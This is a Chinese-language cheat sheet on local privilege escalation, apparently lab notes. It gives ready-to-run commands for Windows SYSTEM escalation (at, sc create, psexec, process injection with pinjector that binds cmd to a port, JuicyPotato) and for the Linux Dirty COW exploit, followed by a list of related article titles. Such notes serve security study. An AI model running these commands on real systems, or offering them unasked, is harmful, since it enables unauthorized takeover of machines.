本地提權
本地提權
方法一:AT命令提權
條件:(1)適應範圍(win3->win8) (2)必須在administrats組
at 18:41 /interactive cmd
taskmgr //開啟一個程式
殺死當前explorer.exe桌面程式,再開啟就是system
方法二:建立服務提權
建立一個服務
sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start syscmd
方法三:核心提權
psexec -i -s -d cmd
pinjector.exe -p 2152 cmd 12345
方法四:程式注入
優點:隱藏程式
pinjector.exe -l //列出當前可被注入的程式
pinjector -p PID cmd 埠 //注入指定程式將cmd反彈給連線該埠
漏洞提權
爛土豆提權 ---------軟體在/工具/提權/爛土豆
MS16-075漏洞
原理:令牌提權
步驟:
Juicypotato.exe -p whoami
髒牛提權(linux)
(CVE-2016-5195)核心提權漏洞分析
原理:Linux核心的記憶體子系統在處理寫時拷貝(Copy-on-Write)時存在條件競爭漏洞,導致可以破壞私有隻讀記憶體對映。
影響範圍:Linux核心>=2.6.22(2007年發行)開始就受影響了,直到2016年10月18日才修復。
實驗工具 gcc:linux系統下的編譯器,用於編譯程式
dirtyc.c:本次實驗漏洞驗證的POC原始碼
步驟:
gcc -pthread dirty.c -o dirty -lcrypt //編譯
./dirty password
相關文章
- Potato家族本地提權分析
- 利用萬用字元進行Linux本地提權字元Linux
- Linux提權————利用SUID提權LinuxUI
- 重要預警 | Ubuntu 16.04 4.4 系列核心本地提權漏洞Ubuntu
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- Linux提權-70種sudo提權彙總Linux
- windows提權--組策略首選項提權Windows
- 最新發現!Windows 11也受本地提權漏洞HiveNightmare影響WindowsHive
- Linux提權Linux
- Linux 提權Linux
- linux sudo提權Linux
- windows提權 (一)Windows
- Linux 提權-CapabilitiesLinux
- mysql UDF提權MySql
- SQL Sever提權SQL
- Windows令牌竊取提權和爛土豆提權學習Windows
- Windows提權實戰——————1、IIS6.exe提權實戰Windows
- Linux提權————Linux下三種不同方式的提權技巧Linux
- Linux提權-許可權升級Linux
- VMware Tools本地提權漏洞CVE-2022-31676分析與復現(1)
- CVE-2014-0038核心漏洞原理與本地提權利用程式碼實現分析
- 提權 | Windows系統Windows
- MySQL UDF 提權初探MySql
- Linux 提權-NFS 共享LinuxNFS
- bulldog_1 提權
- Linux 提權-LXD 容器Linux
- Linux 提權-Docker 容器LinuxDocker
- Linux 提權-MySQL UDFLinuxMySql
- Linux 提權-核心利用Linux
- Linux 提權-Cron JobsLinux
- Linux-SUID提權LinuxUI
- Windows提權總結Windows
- Powershell 提權框架-Powerup框架
- Windows提權系列————上篇Windows
- Windows提權系列————下篇Windows
- Windows提權方式彙總Windows
- DC-4-teehee提權
- DC-5-screen提權